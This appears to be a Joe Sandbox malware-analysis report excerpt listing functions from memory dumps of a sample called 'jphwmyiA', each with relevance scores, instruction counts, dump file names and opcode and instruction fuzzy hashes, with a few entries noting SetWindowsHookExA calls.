Opcode Fuzzy Hash: 884f818e848066dc34306855b82ee7fed7736f9df7e86c94e3116b8991cb634d
Instruction Fuzzy Hash: 8DD16C70E003459FCB04EF79D48499EBBF5BF88310B10896AD849EB365DB74E945CB94

Function 2911FD20 Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,?,?,?), ref: 2911FDD9

Memory Dump Source

Source File: 0000000C.00000002.3452939155.0000000029110000.00000040.00000800.00020000.00000000.sdmp, Offset: 29110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_29110000_jphwmyiA.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 74d2909e71dd0c123df16d71ab17d95bfb3cfc4eaab8193c869edc398b0cb3c1
Instruction ID: fb5458999a50f3baf1e182c21741a19a5212957a92ae1abf052b6d01d2fed449
Opcode Fuzzy Hash: 74d2909e71dd0c123df16d71ab17d95bfb3cfc4eaab8193c869edc398b0cb3c1
Instruction Fuzzy Hash: 054186B8D012589FCF14CFAAD984AEEFBB1BF49314F10902AE858B7210D734A946CF55

Function 2911FD28 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,?,?,?), ref: 2911FDD9

Memory Dump Source

Source File: 0000000C.00000002.3452939155.0000000029110000.00000040.00000800.00020000.00000000.sdmp, Offset: 29110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_29110000_jphwmyiA.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 94f295711e66c34e73078d05a4a202ef347f12c69098fab9c25026b5ef4f7b90
Instruction ID: 312fc20ddf52ea3cd465dcef47f658a607bf870be5a569b1ff33f9802e4f8488
Opcode Fuzzy Hash: 94f295711e66c34e73078d05a4a202ef347f12c69098fab9c25026b5ef4f7b90
Instruction Fuzzy Hash: 194167B8D012589FCB14CFAAD984AAEFBB1FB49314F10942AE818B7350D734A946CF55

Function 2A1EFE70 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

LR]q, xrefs: 2A1EFEBE

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 99b1e5229edc90a1429843ccd9a25fe0203a7839b25b7c88d963490b84d5c62d
Instruction ID: 447c955c69d3006ee507adc62da17352ae0fc36059658bd4b7ef0ce395a69dd1
Opcode Fuzzy Hash: 99b1e5229edc90a1429843ccd9a25fe0203a7839b25b7c88d963490b84d5c62d
Instruction Fuzzy Hash: 9F310131E012189FDB04DFB9C594AEDBBF2AF49304F104569D405BB291DB799A45CF90

Function 2A1EFE80 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

LR]q, xrefs: 2A1EFEBE

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 9681f5c56a2038a73ce40fd8980fea6e2ec36cb1cf4091f9f60a3495823b12ef
Instruction ID: eb41e5875cb3a663ad91b18000f50dbfddada33d2867d9ca429295115d7d2d4c
Opcode Fuzzy Hash: 9681f5c56a2038a73ce40fd8980fea6e2ec36cb1cf4091f9f60a3495823b12ef
Instruction Fuzzy Hash: DC310371E012199FDB04DFA9C544BEEBBF2BF49314F108429D405BB290DB79AA85CFA4

Function 2A29C770 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455587633.000000002A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a290000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3cd2526ae5a7ee6c34edff99fc809f87e0a2f8de2733b94cb289dd292e8ae6
Instruction ID: dbde339023c8a972b73c10f5493842f71f456ef7788757d5b8859340ab821006
Opcode Fuzzy Hash: 6b3cd2526ae5a7ee6c34edff99fc809f87e0a2f8de2733b94cb289dd292e8ae6
Instruction Fuzzy Hash: CF826C74E012299FDB64DF69CD98B9DBBB2BF89700F1081E9944DA7261DB346E81CF40

Function 2911F0C8 Relevance: .7, Instructions: 725COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3452939155.0000000029110000.00000040.00000800.00020000.00000000.sdmp, Offset: 29110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_29110000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 261d26810864953379446b5ff6ae977fb72798ccafd47c384454c042bd0e013d
Instruction ID: 76ac10ec55135f2fdf56139581bb0bfe52b87b5f89bc76d98fad5934de10caa5
Opcode Fuzzy Hash: 261d26810864953379446b5ff6ae977fb72798ccafd47c384454c042bd0e013d
Instruction Fuzzy Hash: B272BE74E012299FDB65DF6AC984BD9BBB2BF49304F5091E9D408A7351DB34AE82CF40

Function 2A254908 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455308308.000000002A250000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4e73bf2b968005dd8d4e9f18d52979015635b87299e839ae61e7ff8f01e9bd6
Instruction ID: fee97cb46e87b8bac8f4d45d1a7f784b3c827fad3dafcf67aaa5fbc7f488d1ba
Opcode Fuzzy Hash: e4e73bf2b968005dd8d4e9f18d52979015635b87299e839ae61e7ff8f01e9bd6
Instruction Fuzzy Hash: C1E1C074E01218CFDB64DFA5C944B9DBBB2BF88300F1081A9D408BB3A5DB395A85CF55

Function 2A1E65C0 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce94829a314861302f81eee311bc5ef436665f35af449a341602fcd10f77be0b
Instruction ID: 2bcd5253b8f4337906444559c5603dab9d7fabbd6d43279b99cc7efa7512b971
Opcode Fuzzy Hash: ce94829a314861302f81eee311bc5ef436665f35af449a341602fcd10f77be0b
Instruction Fuzzy Hash: 2DE1C274E01218CFEB54DFA5C944B9DBBB2BF89304F2080A9D408AB3A5DB395A85CF10

Function 2A2809D0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455512050.000000002A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a280000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 156862c7efc6cd01e41ad6b893e2d9ba7e2a60c433aecdbe59db09fae11624a7
Instruction ID: 43ba93a915908be8a760f0c6b3f5f1a8586aff900c026bab678f4f94a2a04605
Opcode Fuzzy Hash: 156862c7efc6cd01e41ad6b893e2d9ba7e2a60c433aecdbe59db09fae11624a7
Instruction Fuzzy Hash: D9D19174E01218CFDB54DFA5C994B9DBBB2BF89300F1081A9D409AB3A5DB395E85CF50

Function 2A25DF18 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455308308.000000002A250000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 827e993b121db94d20c9cfa6da31644bd5620093fe5d8f64a9d578bdef25c494
Instruction ID: 21e812b0a50b44e20e00d3015f8141cdb37d8c17b06fe5f1fddb99f787118b60
Opcode Fuzzy Hash: 827e993b121db94d20c9cfa6da31644bd5620093fe5d8f64a9d578bdef25c494
Instruction Fuzzy Hash: EBD19074E01218CFDB58DFA5C994B9DBBB2BF89300F1081A9D409AB3A5DB395E85CF50

Function 2A254FA8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455308308.000000002A250000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd35f41be1c4c53803c2bf61188197f1fdbb5346d96bac0b089d511a31705579
Instruction ID: 3f851d6336f0a0594bea9d0145f490e75699be226968064842dd38cb855e334b
Opcode Fuzzy Hash: cd35f41be1c4c53803c2bf61188197f1fdbb5346d96bac0b089d511a31705579
Instruction Fuzzy Hash: D9D1A074E01218CFDB54DFA5C994B9DBBB2BF89300F1081A9D409AB3A5DB355E85CF50

Function 2A1EBA10 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4ffaa8f18061667b75c48bfbb38ad4fa6751621afa7ad97d54ae87eb16a6259
Instruction ID: 902fb482314a2233312a90796b757d40d1708049c196f7abfb9fa26482a12421
Opcode Fuzzy Hash: b4ffaa8f18061667b75c48bfbb38ad4fa6751621afa7ad97d54ae87eb16a6259
Instruction Fuzzy Hash: 40D1D074E01218CFDB54DFA5C985B9DBBB2BF89300F1080A9D908AB365DB356E85CF51

Function 2A1E7AF0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf2a9299fd94d9d507cad375438de5fec0bca4e9676615bf46084d784d0c6d95
Instruction ID: af8777ff2267cd0992cb09cbf69f5f7f3665fb0c2a10c73787683d736306fbc8
Opcode Fuzzy Hash: bf2a9299fd94d9d507cad375438de5fec0bca4e9676615bf46084d784d0c6d95
Instruction Fuzzy Hash: 8BD1DE74E01218CFDB54DFA5C984B9DBBB2BF89300F1080A9D908AB365DB396E85CF51

Function 2A1EA340 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab54cb93b1dc03431c7cf426c241876e922c59f1efca0cd062468ad7f1e4f369
Instruction ID: 1efd396746e895e7fa5667fa37b1f8b089e2cbaf2ff0009c0c61d647fd974f83
Opcode Fuzzy Hash: ab54cb93b1dc03431c7cf426c241876e922c59f1efca0cd062468ad7f1e4f369
Instruction Fuzzy Hash: 58D1D074E01218CFDB54DFA5C994B9DBBB2BF89300F1080A9D808AB3A5DB356E85CF51

Function 2A1D0E38 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455080995.000000002A1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1d0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc0abc3f8ed701b0adc60b18515d7b00249166b1a07ea73f803556298778d302
Instruction ID: b7f3280768550ea56689ee6ffe57f66fa943f907ec1e0d17ba1658596140a88f
Opcode Fuzzy Hash: fc0abc3f8ed701b0adc60b18515d7b00249166b1a07ea73f803556298778d302
Instruction Fuzzy Hash: 0DC1A274E00218CFDB54DFA5D995B9DBBB2FF88300F2081A9D809A7365DB399A85CF50

Function 2A1DB580 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455080995.000000002A1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1d0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f98935d571c61ea3fc21433ecfcff928920292d42bddac13987543a35b1004
Instruction ID: 63392f2b732211f15b71291fe3f299024a95fbbbfe13dde5d607805a95ada64d
Opcode Fuzzy Hash: 35f98935d571c61ea3fc21433ecfcff928920292d42bddac13987543a35b1004
Instruction Fuzzy Hash: A4C1C175E00218CFDB54DFA5C985B9DBBB2BF89300F1080A9D909AB3A5DB395E85CF50

Function 2A1E11A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed42b57d0a7b6f642c51b525f655683b8123e5120a35f1de19bea9ad58241b5b
Instruction ID: f39c56b331b2d68b873801fab30b3693c9b1ad244f08ddf999b594a2549f399c
Opcode Fuzzy Hash: ed42b57d0a7b6f642c51b525f655683b8123e5120a35f1de19bea9ad58241b5b
Instruction Fuzzy Hash: A3C1B274E01218CFDB54DFA5C985B9DBBB2BF89300F1080A9D809AB365DB395E85CF50

Function 2A3F31C0 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98cd98047a2e322df86401a8d858b5fc094a0c72f0bd5b4fbb6931073b74c750
Instruction ID: 4b3a8810bc63828aa5a7342fe652f84ccecb84d3a631e3dc07b69703caf50db4
Opcode Fuzzy Hash: 98cd98047a2e322df86401a8d858b5fc094a0c72f0bd5b4fbb6931073b74c750
Instruction Fuzzy Hash: 5E916935911259DFDB04AFB0C85C7AEBBB2AF06306F10546AD102B72E1CB7D4A89CF95

Function 2A3F31D0 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455738112.000000002A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a3f0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36d7da24542ab227bbf39aaef8e1a3dbaeb8c85953c0add8c9141e43394e3e6e
Instruction ID: 7c46df3e194ee52ea7710b5013d88be53b1999413d77215c61dc531b33b50fd5
Opcode Fuzzy Hash: 36d7da24542ab227bbf39aaef8e1a3dbaeb8c85953c0add8c9141e43394e3e6e
Instruction Fuzzy Hash: 46915D75911219DFDB04AFA0C85C7AEBBB2EF06306F10542AD106772E1CB7D4A89CF95

Function 2A1D1440 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455080995.000000002A1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1d0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f440a040d413266dfd91e7c680c3d0d73cfc2ff6ef1484f58be6147a79c040a
Instruction ID: 8781bda018b7ebd389aed80acdf6edbaf5748726906f1c9a2c0c8d904a3c2f03
Opcode Fuzzy Hash: 3f440a040d413266dfd91e7c680c3d0d73cfc2ff6ef1484f58be6147a79c040a
Instruction Fuzzy Hash: 09A12770E00618CFEB14EFA9D944BDDBBB1FF49314F208269E409A72A1DB759A85CF50

Function 2A1D178B Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455080995.000000002A1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1d0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 368a2af08e468bc7bb988f64bcad6e462c8e4bcef654762738df71e881b163b8
Instruction ID: 08a9193e29fcaa1a26e6ca8d307661f811d965af2f749892e4e712f2a9d5c5a4
Opcode Fuzzy Hash: 368a2af08e468bc7bb988f64bcad6e462c8e4bcef654762738df71e881b163b8
Instruction Fuzzy Hash: 4B911470E00618CFEB10EFA9D944BDCBBB1FF49310F209269E409A72A1DB759A84CF10

Function 2A28E810 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455512050.000000002A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a280000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec9a9c6814bc18debcd6ac4a457c11370168b9a924504a61c46a4ffe7e1ccd8
Instruction ID: d7992f4e68c72bf29ae1f48f62e549111182137ffbc770102aed5435e4bb2c78
Opcode Fuzzy Hash: fec9a9c6814bc18debcd6ac4a457c11370168b9a924504a61c46a4ffe7e1ccd8
Instruction Fuzzy Hash: FF81C775E00218DFDB48DFA5C994B9DBBB2BF88304F208429D415BB3A5DB399986CF50

Function 2A28EB30 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455512050.000000002A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a280000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3e52fde41f60e9d0f7cb29ac6587692b488b0f670fb0ed638423c44bd2168b1
Instruction ID: 7ebef34edabb64fd762bdd4d5462a5f61e920794ee3129c01e8cc72b4ff781e6
Opcode Fuzzy Hash: f3e52fde41f60e9d0f7cb29ac6587692b488b0f670fb0ed638423c44bd2168b1
Instruction Fuzzy Hash: 0281E674E01218DFDB48DFA5C884B9DBBB2BF88304F608429D405BB3A5DB399986CF50

Function 2A287150 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455512050.000000002A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a280000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c725ab498f8da64a55d41f8208d3e81343ddcbb40382f9bb75113785cc6247e3
Instruction ID: dc77515a993c44f226acebfe5592e866362b39d552cdea77aee5254139f84142
Opcode Fuzzy Hash: c725ab498f8da64a55d41f8208d3e81343ddcbb40382f9bb75113785cc6247e3
Instruction Fuzzy Hash: 8481C475E00218DFDB48DFA5C994A9DBBB2BF88304F608029D815BB3A5DB395986CF50

Function 2A296120 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455587633.000000002A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a290000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08147dbc9623ea28acb753db1591b5612d2a848b5cc73513c2a9b2315573f484
Instruction ID: 340e59b27bd9ecac21350c42aef4442d66cd2fd98e501f5618f711194489f303
Opcode Fuzzy Hash: 08147dbc9623ea28acb753db1591b5612d2a848b5cc73513c2a9b2315573f484
Instruction Fuzzy Hash: A581D574E01218CFDB08DFA9C994B9DBBB2BF88304F608429D405BB3A5DB395986CF54

Function 2A1E8020 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ac08631dd97fc933840b7ef855bbbc16f55767d36dbfb7c52e965c945c91428
Instruction ID: 9df9ba291236cffb1369cc7bb24858e307e839e4bc2fe5ead876a7de0f7be254
Opcode Fuzzy Hash: 7ac08631dd97fc933840b7ef855bbbc16f55767d36dbfb7c52e965c945c91428
Instruction Fuzzy Hash: 0861F674E012199FDB08DFE9D990ADEBBF2BF88310F14C529E808BB355DA319942CB50

Function 2A254E98 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455308308.000000002A250000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef06f8ef8be64160137fff70706c9febab0cfb302fb2a5f88959593cf87d93e
Instruction ID: c9c4a14f75f769a948ddeadae683f90285bcd78a117a32658ceefdf3fb4ffac2
Opcode Fuzzy Hash: bef06f8ef8be64160137fff70706c9febab0cfb302fb2a5f88959593cf87d93e
Instruction Fuzzy Hash: 60518C72D106588BDB49DFB6C8953DDFBB2BF89304F18816AC459BB251EB385A02CF50

Function 2A2548FA Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455308308.000000002A250000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de08ff540ece7244ab777defbfc72f7bedbf42b1b535a24bfab3e5b303f2fa19
Instruction ID: f203ca91206a837c0c0e9f67ca353cffed1f211058819d09beccfd29d72d625c
Opcode Fuzzy Hash: de08ff540ece7244ab777defbfc72f7bedbf42b1b535a24bfab3e5b303f2fa19
Instruction Fuzzy Hash: CD41DFB1D002188BEB58DFAAC8547DDBBF2BF88304F14D069C418BB254DB354A86CF14

Function 2A1E65B0 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff5176dd905b41abc055f53d8cf936aec372ed3e1457219151549d7f35f62b88
Instruction ID: 58c0a43069090222a001e92b713c676f528d3647761800b55cdf683447c705c8
Opcode Fuzzy Hash: ff5176dd905b41abc055f53d8cf936aec372ed3e1457219151549d7f35f62b88
Instruction Fuzzy Hash: 4841F3B1E006088BEB18DFAAC9447DDBBF2BF89304F14D169C418BB251DB355A46CF10

Function 2A1E7AE0 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d353cbb717d0c430dce6b7783ee8fce869539902728a985f73e562bc6f4b9827
Instruction ID: 9a6b04f95cb91edfb65cb2f7e16bdfba5769bc550726eb88487a0dad052355ad
Opcode Fuzzy Hash: d353cbb717d0c430dce6b7783ee8fce869539902728a985f73e562bc6f4b9827
Instruction Fuzzy Hash: 1B411971E00648CBEB08DFAAD9546DDFBF2AF89304F14D429C418BB265EB345A46CF40

Function 2A1EBA01 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1af5128ae20ab195f8fb849f6b69414030161b4319bd3d20dbfa1354c7ff82
Instruction ID: fd0b80aefe4b531c11881f30eec3c7726e9892df9c8470283088c3064b0859bb
Opcode Fuzzy Hash: da1af5128ae20ab195f8fb849f6b69414030161b4319bd3d20dbfa1354c7ff82
Instruction Fuzzy Hash: 36411671E05658CBDB08DFAAD9406DDFBF2AF88304F14C029C408BB265EB345A46CF40

Function 2A1EA330 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2281f0ceabee81e7b7b790cd1f24979753c6a60dcd28f33e878d320deff779eb
Instruction ID: 0e40946381a9ab728f05463553d41e1f0fee70fdde1a900aeadb4505b5044c0e
Opcode Fuzzy Hash: 2281f0ceabee81e7b7b790cd1f24979753c6a60dcd28f33e878d320deff779eb
Instruction Fuzzy Hash: 0D41D271E006188FEB58DFAAC9946DDBBF2BF89305F14D129C408BB264EB355A46CF40

Function 2A2809BF Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455512050.000000002A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a280000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d40a506e76af57cbf13d962b684ad1b724a84f0e5d85c27c2f40d7fb5027bbcf
Instruction ID: f8404c6ad4ce2bf557b75492c7955c392a57e6ce22bef1e9ebdad5ff1c8bc3c1
Opcode Fuzzy Hash: d40a506e76af57cbf13d962b684ad1b724a84f0e5d85c27c2f40d7fb5027bbcf
Instruction Fuzzy Hash: 7741F2B1E046188FDB18DFAAD84479EBBF2BF89304F14C16AD418BB2A5DB354942CF50

Function 2A25DF09 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455308308.000000002A250000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37054ce677558b2541c8240a707edadc4b03c31f1f8101970931c3a4d4365ac5
Instruction ID: fee547eef74cbfdd2634706c48994940236837827145846e29db9fc820c53165
Opcode Fuzzy Hash: 37054ce677558b2541c8240a707edadc4b03c31f1f8101970931c3a4d4365ac5
Instruction Fuzzy Hash: 5C41D2B1E002189BDB58DFAAD8947DEBBF2BF88304F14D02AD418BB255EB355946CF50

Function 2A1E1190 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455159218.000000002A1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A1E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a1e0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e767fc5feebc63afbf6fa0161e2e09ee4efe824417a78cfad42ac400fca8a562
Instruction ID: b0ef297310c3781abb524e33f80fef6b80a8f18f3d8b3b9d3f9f623d381f6351
Opcode Fuzzy Hash: e767fc5feebc63afbf6fa0161e2e09ee4efe824417a78cfad42ac400fca8a562
Instruction Fuzzy Hash: 8541F371E006488BDB18DFBAC9546DEFBF2AF89304F24D12AC419BB265DB355A46CF40

Function 2A287140 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455512050.000000002A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a280000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8954a1953fe4dc8ba8e18a9706875c3fe2b26e4b5dfd0af1a5ef11f63933d17e
Instruction ID: ed0f47a71d349564c5104973c09acb97f00fc533ce513160d57b4653ce94784b
Opcode Fuzzy Hash: 8954a1953fe4dc8ba8e18a9706875c3fe2b26e4b5dfd0af1a5ef11f63933d17e
Instruction Fuzzy Hash: CB31F2B1E00208CFDB48DFAAD8446DEFBB2AF99300F14D02AD408BB295EB355946CF50

